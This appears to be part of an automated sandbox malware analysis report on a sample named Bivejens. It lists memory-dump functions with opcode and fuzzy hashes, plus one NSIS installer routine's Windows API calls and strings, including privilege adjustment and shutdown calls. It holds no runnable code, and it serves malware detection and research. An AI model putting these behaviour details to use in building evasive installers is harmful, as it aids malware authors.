Instruction ID: 943e107c60d7c140b8d28431f6be0b00db8b4a03245a215933d91096f332b57a
Opcode Fuzzy Hash: 039004ebdf0b148d97c5b4328bba1355f487ea9ed5fdfba8a7a3437e59994a34
Instruction Fuzzy Hash: D631EE71E042188FEB08DFAAD851ADEBBF2BF89300F14C12AC418BB255DB365946CF50

Function 219B8461 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617815047.00000000219B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219b0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 504f600d047736499ebd47d33e110254b4e10abe32f7e8887cc5445383964678
Instruction ID: 11f1866071f29d25f9c85e74b231daf759eb9d1741c3ce0121d716768e82cfa6
Opcode Fuzzy Hash: 504f600d047736499ebd47d33e110254b4e10abe32f7e8887cc5445383964678
Instruction Fuzzy Hash: 6331C174E01258CFDB18DFAAD850AEEBBF2BF89300F14D12AC418AB254DB745906CF54

Function 219AD401 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af8bda679dc4b990f4ff71fac1a69b74405a59ad3e3d6581ce4ac140ef67251a
Instruction ID: 0d84382a11845328eb6ec9ea90060b5e2ef9977dc51a314b614c1ab9799acdf8
Opcode Fuzzy Hash: af8bda679dc4b990f4ff71fac1a69b74405a59ad3e3d6581ce4ac140ef67251a
Instruction Fuzzy Hash: 2431E274D052088FDB18DFAAD550ADDBBF2AF89300F24C12AC408BB264DB355A46CF50

Function 219B21A7 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617815047.00000000219B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219b0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da328840f065ebd3c9fb37f8de25fc64fc68cfa31cc28025f0e395835adc5516
Instruction ID: 9b752eb8e58f3f9a435b67590cc7d0f47187d0b0f7ffb8b5ce75ec4c37215adc
Opcode Fuzzy Hash: da328840f065ebd3c9fb37f8de25fc64fc68cfa31cc28025f0e395835adc5516
Instruction Fuzzy Hash: 6031B175E012088FDB08DFAAD5506DEBBF2EF89301F24842AC418BB264DB355A46CF54

Function 219BFB22 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617815047.00000000219B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219b0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 801388eaff0e1e5a4948e0f45c5e0b939c355f0f4a6b72f5a287b0acb5e59c4a
Instruction ID: e06986026ba208da88c7d5ddae0b85546563914f18d65a4ed8913c2750027a9f
Opcode Fuzzy Hash: 801388eaff0e1e5a4948e0f45c5e0b939c355f0f4a6b72f5a287b0acb5e59c4a
Instruction Fuzzy Hash: 8731A175E012188FDB18DFAAD850AEEBBB2BFC9300F10D12AD418BB255DB355946CF54

Function 00158378 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 815913f5195582203a751c18e4cd49d674870d0ce329da83bba45a6e9b5eae9c
Instruction ID: 57e8c9c20e6393214aa72ad8d967ec765fa9e371b7dc74223dc6c99ed65b9564
Opcode Fuzzy Hash: 815913f5195582203a751c18e4cd49d674870d0ce329da83bba45a6e9b5eae9c
Instruction Fuzzy Hash: 8B21B031304202CBDB2557398854B7F26A6AFC474AF248039DC16EF7A5EF65CC8B9791

Function 219B81EA Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617815047.00000000219B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219b0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85fe89aa912b33285e324851048043440bcb387c84037a0f7c10892598614eb1
Instruction ID: ebf576b46d4cd299f784e82bb8bec4d49ffd93aba32d9cad3a54df050c9d3351
Opcode Fuzzy Hash: 85fe89aa912b33285e324851048043440bcb387c84037a0f7c10892598614eb1
Instruction Fuzzy Hash: 26319074E016088FEB08DFAAD550ADEBBF2AF89300F64912AD418BB254DB355A46CF54

Function 00158380 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98f22de7161d91e24d967494eb2f990ee3c0bf79c3ac17e680da20a494d19517
Instruction ID: e474d91273da548ba293672d090f30167a6082513bcf41b07413a36921c69967
Opcode Fuzzy Hash: 98f22de7161d91e24d967494eb2f990ee3c0bf79c3ac17e680da20a494d19517
Instruction Fuzzy Hash: 0721F330300212CBDB2967398854B3F36A6AFC474A7148039DD16EF765EF65CC8AD791

Function 001528F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96e6e4d654278e2effec07a2db8775dcedfadc8c345fd9f2242d41d0e7bd84fd
Instruction ID: 8597e02219acc27f28c51606759bb6988081222e85293e7782e93801e27bb747
Opcode Fuzzy Hash: 96e6e4d654278e2effec07a2db8775dcedfadc8c345fd9f2242d41d0e7bd84fd
Instruction Fuzzy Hash: CC215E36B001249FCB15DB68C4409AE7BA5FFAA365F60C069EC199B340DB31EE46CBD1

Function 001562F8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a49a597d0cdeca8d34c234dae7e6a66c4eba2dc4a8727f07602154e38c485307
Instruction ID: 23b4966ce7d3484742391fe23c5591b7c86fd6bc848af8bfb7ce5ba926ee9a37
Opcode Fuzzy Hash: a49a597d0cdeca8d34c234dae7e6a66c4eba2dc4a8727f07602154e38c485307
Instruction Fuzzy Hash: F321FF35304511CFC7199B29C89852EB7A2FF893523658078E82ECB7A4CF31DC068BD0

Function 000AD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595225558.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ad000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77797e50d5e4e909746620687049221563d38cfb33e3174d62b78f8965664200
Instruction ID: 3b287f7e225e9c16b788f3e98ebc00492bfac6d512d751c7062ac4706bae3bbb
Opcode Fuzzy Hash: 77797e50d5e4e909746620687049221563d38cfb33e3174d62b78f8965664200
Instruction Fuzzy Hash: A3210775504304EFDB24CF60D9C4F26BBA1FB85314F24C66EE94A4B642C77AD846CA62

Function 219AEBE2 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81fd28cd1220b046a8d6e70b537340f84f53e42e0a6473683d6cc5b8cae7e207
Instruction ID: 66d4b9d7a9c3b16369d7cbf1ed7b454a7b5493fd307330bafbe6a4416e044ef1
Opcode Fuzzy Hash: 81fd28cd1220b046a8d6e70b537340f84f53e42e0a6473683d6cc5b8cae7e207
Instruction Fuzzy Hash: 36217C71E00215CFCB50DF78D844A9E7BF9BF49262B2041A9E889E7360DB31D9058BA1

Function 00155E3A Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd32750cd52da8cb486257fd4152122e495824f6a65a97d51c564428b9137d53
Instruction ID: 87958a4b104e8c965843033d1d6fbb4ab761dea6a6aa2a3e2fd27d4db584c684
Opcode Fuzzy Hash: cd32750cd52da8cb486257fd4152122e495824f6a65a97d51c564428b9137d53
Instruction Fuzzy Hash: 1F1138327082459FCB074A689C106EA3F77EFC1352B2840A7F955CB192DB358E1A97A1

Function 00155650 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f843554d1508bc9eedf70f8b51af1402da6e68c7d35cf13cd3cbbbfacf847491
Instruction ID: 6c269b263c5b8bf72f2665b3589f22f2ceea99ca65d0bcd4d560916cfa9fece5
Opcode Fuzzy Hash: f843554d1508bc9eedf70f8b51af1402da6e68c7d35cf13cd3cbbbfacf847491
Instruction Fuzzy Hash: 98210531605148DFCB019F24D9A47AE3BB2EB88315F608068FC199F345CB35DE55DBA0

Function 00159761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e9f7d1e6871d6f819d5bb0568aa34ee608f71775d94082b45b3c20f15e2ba27
Instruction ID: b6c7c1f865940ddaa6a59de9cef61d61a0134162798ab32b5edf542cfe8bd94a
Opcode Fuzzy Hash: 9e9f7d1e6871d6f819d5bb0568aa34ee608f71775d94082b45b3c20f15e2ba27
Instruction Fuzzy Hash: 5B216070E0124CDFCB05CFA5D990AEDBFB6AF49305F248099E859A6290DB31DD85DF60

Function 00156300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b057b2f9252e0409f151ef7833d32ce76f7dd78631a3f0d00b501a618a687127
Instruction ID: 65972782a1d8542b4d629124cb9192397f870cf01b9aa56fda2f5f416ca85192
Opcode Fuzzy Hash: b057b2f9252e0409f151ef7833d32ce76f7dd78631a3f0d00b501a618a687127
Instruction Fuzzy Hash: 2A118E35704611DFC7195B2AC89892EB7A6FF897623594468E81ACF760CF21DC468BD0

Function 0015F650 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d4c1826b9f6caaa8f5d59f4e1d7f1436c98a1ac9655236601023d92ad2d9d1c
Instruction ID: 2dc7c1a9d9508451480ac5dcc12b9c108317dcb14c6d668df8707e10e281a4d0
Opcode Fuzzy Hash: 2d4c1826b9f6caaa8f5d59f4e1d7f1436c98a1ac9655236601023d92ad2d9d1c
Instruction Fuzzy Hash: FB115170D00209DFEB04EFA5C58179EBBF5FB85300F10C5A9C4989B261EB755A459F91

Function 001527F7 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d685124b043f728efd666f46adbae8414fe84be4d6a699ba8f5db77b92f7955f
Instruction ID: f501f3765658e533696eda158e83424e86a1a5f1a97dd06e029350d878a0dc37
Opcode Fuzzy Hash: d685124b043f728efd666f46adbae8414fe84be4d6a699ba8f5db77b92f7955f
Instruction Fuzzy Hash: 3F21AF74D05209CFCB40EFA9D9445EEBBF4FF4A301F1051AAD859B7220EB305A99CBA1

Function 00155EA0 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66f42becaeef8f27a4dd86cee45dcbc41d811fd89bbbc654bcd5de9601883f3e
Instruction ID: 962aaef4604d12c21efcad93bccc7430c75b931bc433b71e62a984bfde7f8593
Opcode Fuzzy Hash: 66f42becaeef8f27a4dd86cee45dcbc41d811fd89bbbc654bcd5de9601883f3e
Instruction Fuzzy Hash: BB01F732704114AFCB059E589C51BAE3BABDFC8750F148029FD29DB284DF318E169B90

Function 219AEC8A Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe656285ce69aace8777832c89ee44ca0c26bb90a921cbc7f68064e82ea364f4
Instruction ID: 681622156c69e51cfbcc1a7cd4397fc492875697e663f8980d28eb203747d022
Opcode Fuzzy Hash: fe656285ce69aace8777832c89ee44ca0c26bb90a921cbc7f68064e82ea364f4
Instruction Fuzzy Hash: 1C01A27AB001109FC740DB7CE844DD97BFEEF89262B2041A5E989D7361DB22DD158B91

Function 00159D59 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8681d278ccb53d45aacb18c3ff11637878f99328622e21820074b547c2f4448
Instruction ID: 094b6a7d9754d0af5a125196b91085a2b7ad6b8054f0cfe036769306775b6191
Opcode Fuzzy Hash: d8681d278ccb53d45aacb18c3ff11637878f99328622e21820074b547c2f4448
Instruction Fuzzy Hash: 60F04436300214AFDF085BA59854A7EBBABEFDC3A1B144429BD4AC7351EF61CC4587A1

Function 219AE644 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c55ab6bb2b7d6a021d5ebc890d9d2de189e56d70e3a3c98eb0483048feff24a7
Instruction ID: 5c5f4276bd378c35c341ac0c45a07646c1a0116b2cdf2fc6aad80aa790b81f3f
Opcode Fuzzy Hash: c55ab6bb2b7d6a021d5ebc890d9d2de189e56d70e3a3c98eb0483048feff24a7
Instruction Fuzzy Hash: 5BF062357001108FD7049F69D855D5A77ADFFC576972044AAF91DCF2A1DB21DC068790

Function 0015E8EF Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d0598afc9b7be264ca7c4d02d221de3860554bcdc1c885ff36b5b36d1676b2c
Instruction ID: 85512994c2dd80922a8661af6271e5e639eba7977d541ed7f2677cb298b593e6
Opcode Fuzzy Hash: 6d0598afc9b7be264ca7c4d02d221de3860554bcdc1c885ff36b5b36d1676b2c
Instruction Fuzzy Hash: 5F014874E04209DFDB00CFA8D8849EEBBF1FB89311F0081AAD850A3350D7795A2ADF91

Function 219AEB58 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb4ef59662b2e2f4ae9b01f151c823e4bde6bceb4c09c427ff1354cad201a53e
Instruction ID: 77fd6bf6344bb2c1c6b379216d9a3d873d8fdd1237f62a51dbd149cdb8e33a24
Opcode Fuzzy Hash: bb4ef59662b2e2f4ae9b01f151c823e4bde6bceb4c09c427ff1354cad201a53e
Instruction Fuzzy Hash: 41011D70E00219CFDF44EFB9C945ADEBBF9BF48201F10817AD559E7250E73959058BA1

Function 219AE6A0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c3f2743411ea7bb49aa19ec968bda6b11d7fc46f1e12cd200b1620598482908
Instruction ID: 3b2e822d7c71d216261248df0cd7ddb5ef3eb08496bbb78248bf278b4e1860fe
Opcode Fuzzy Hash: 5c3f2743411ea7bb49aa19ec968bda6b11d7fc46f1e12cd200b1620598482908
Instruction Fuzzy Hash: E7F01C353401148FD7089F2AD868E2A37EEFFC975571584A9F90ACB7A1DE61DC01C790

Function 0015ABF8 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2bc76763bfbd4c2637622e2239d4362e1e3c4c0d314d6fae8869b82641db947
Instruction ID: a1d37d00a78ac7f0e3b930a3d59c20605f2915acd5d4fe0845fb590617e80a66
Opcode Fuzzy Hash: e2bc76763bfbd4c2637622e2239d4362e1e3c4c0d314d6fae8869b82641db947
Instruction Fuzzy Hash: 81F06531380110CF9715AA2DE45462D779EEF84B56395416AE915CF370DF21CC4B8781

Function 00159C29 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d2c57d2a094a2cdb99a6b05ca012d009164b0ee06ac49131f7945a05a64fc75
Instruction ID: b4c8827f2dc89a97a51db17459fd462dc882cb242f67bfc11f196a67df8d106b
Opcode Fuzzy Hash: 8d2c57d2a094a2cdb99a6b05ca012d009164b0ee06ac49131f7945a05a64fc75
Instruction Fuzzy Hash: 54F08236A04118DFCB10DF69D844AEEBBF5EFD8321F11C02AE918C7254D33149599B91

Function 0015AF64 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 539d7ba94bffce3f43645ed0bde90801717e37f6c4e3268b3240d8f4097af7bb
Instruction ID: 7737d26ac470cc67461cbd7336129596e37d3db8e713d90c2fd2fe2f5b1c531b
Opcode Fuzzy Hash: 539d7ba94bffce3f43645ed0bde90801717e37f6c4e3268b3240d8f4097af7bb
Instruction Fuzzy Hash: 9EE0A57A640104AFCB108A84DC41F9DBBB2BB88711F244156EA15AB2A0C731A8219B60

Function 001528B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2870c6d39c9717c5de68ba43246e84160357cafd85cb56711d514ade8cb0a5a
Instruction ID: 7575c555999c5751dd42c298764ec0471084e92922679b7c8193e70e1e0ea7b7
Opcode Fuzzy Hash: b2870c6d39c9717c5de68ba43246e84160357cafd85cb56711d514ade8cb0a5a
Instruction Fuzzy Hash: B8D01231D6022A978B01AAA5DC044DEBB39FE95721B914666D51437140EB70265986E1

Function 001528AB Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc355369fffdb3951f37f9b4b6eda259ae96798e3b0507428ba04ba1bac0478b
Instruction ID: 4e975730a44259d31047bb79c26c3223e38139724948940eb1399c660c81554e
Opcode Fuzzy Hash: cc355369fffdb3951f37f9b4b6eda259ae96798e3b0507428ba04ba1bac0478b
Instruction Fuzzy Hash: 33D0C231D6022ACA8B01EBA49C100EDBB35BE84321B948212C03432150EB30165D86A0

Function 00156741 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1319fb932cc5d69343d3e06e880aa634f8a5e4a880afd006d52efa3525b239a3
Instruction ID: 0da4d4dee91fa23e5b2e766cca1c916d39aefc3818630d7d9a69abb094038dbb
Opcode Fuzzy Hash: 1319fb932cc5d69343d3e06e880aa634f8a5e4a880afd006d52efa3525b239a3
Instruction Fuzzy Hash: 26D05E740143144BCB02A771E8C5689372AAB81114B908698E08A0B96ADEF619864F11

Function 0015AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b741edf2626dd6887c67e769ac4f69715890518f7891a81369d86cdbeb971458
Instruction ID: 26e94226c07c1ad7437e2819ba3e6997675790a9bde76a278802965f4ca68443
Opcode Fuzzy Hash: b741edf2626dd6887c67e769ac4f69715890518f7891a81369d86cdbeb971458
Instruction Fuzzy Hash: 05D0673AB000089FCB149F98EC809DDF776FB98221B148116E915A3260C7319965DB60

Function 00156748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19851f2314dbcf940d409c24b744c7569775b06c9de07c2541ccf99959289a2f
Instruction ID: a0ed61ecf794df9dcdd66c1e629e64b16c7c8e74347f1414d6b3cf5ad2c8a28d
Opcode Fuzzy Hash: 19851f2314dbcf940d409c24b744c7569775b06c9de07c2541ccf99959289a2f
Instruction Fuzzy Hash: 7BC012700143184BD601F761DD85755332E6B805107D0C554E08E0696ADFF62DD54FA5

Function 219AE677 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617780565.00000000219A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 219A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_219a0000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4f2807d0e34e2c859b63a8296621a0649c6c558d8782a4fd1d927bfa69a2cf
Instruction ID: 0e5ca33387c2f02d44b6c03187b355d1ea84ac9c51351306799cdbf851b96b5d
Opcode Fuzzy Hash: fd4f2807d0e34e2c859b63a8296621a0649c6c558d8782a4fd1d927bfa69a2cf
Instruction Fuzzy Hash: B1B09230045202CBCE58DB24A9CDA4C7F78EB8020936102A8C40B8E821CB2160C78E12

Non-executed Functions

Function 00403359 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 410stringfilecomCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 0040337C
GetVersion.KERNEL32 ref: 00403382
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
#17.COMCTL32(?,?,?,?), ref: 004033F2
OleInitialize.OLE32(00000000), ref: 004033F9
SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
GetCommandLineW.KERNEL32(00429200,NSIS Error,?,?,?,?), ref: 0040342A
CharNextW.USER32(00000000,00435000,?,00435000,00000000,?,?,?,?), ref: 00403462

Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,?,?,004033CB,?), ref: 00406670
Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B

GetTempPathW.KERNEL32(00000400,00437800,?,?,?,?), ref: 0040359C
GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,?,?,?), ref: 004035AD
lstrcatW.KERNEL32(00437800,\Temp,?,?,?,?), ref: 004035B9
GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,?,?,?), ref: 004035CD
lstrcatW.KERNEL32(00437800,Low,?,?,?,?), ref: 004035D5
SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,?,?,?), ref: 004035E6
SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,?,?,?), ref: 004035EE
DeleteFileW.KERNEL32(00437000,?,?,?,?), ref: 00403602

Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,?,?,?), ref: 00406291

OleUninitialize.OLE32(?,?,?,?,?), ref: 004036CD
ExitProcess.KERNEL32 ref: 004036EE
lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,?,?,?,?,?), ref: 00403701
lstrcatW.KERNEL32(00437800,0040A26C,00437800,~nsu,00435000,00000000,?,?,?,?,?), ref: 00403710
lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,?,?,?,?,?), ref: 0040371B
lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,?,?,?,?,?), ref: 00403727
SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,?,?,?), ref: 00403743
DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,?,?,?,?,?), ref: 0040379D
CopyFileW.KERNEL32(00438800,00420EA8,?,?,?,?,?), ref: 004037B1
CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,?,?,?), ref: 004037DE
GetCurrentProcess.KERNEL32(?,?,?,?,?), ref: 0040380D
OpenProcessToken.ADVAPI32(00000000), ref: 00403814
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
ExitWindowsEx.USER32(?,80040002), ref: 00403871
ExitProcess.KERNEL32 ref: 00403894

Strings

Error launching installer, xrefs: 00403684
.tmp, xrefs: 00403715
SeShutdownPrivilege, xrefs: 00403823
Low, xrefs: 004035CF
~nsu, xrefs: 004036F9
TEMP, xrefs: 004035E1
NSIS Error, xrefs: 0040341B
UXTHEME, xrefs: 004033A9, 004033AE, 004033B4
TMP, xrefs: 004035E9
\Temp, xrefs: 004035B3

Memory Dump Source

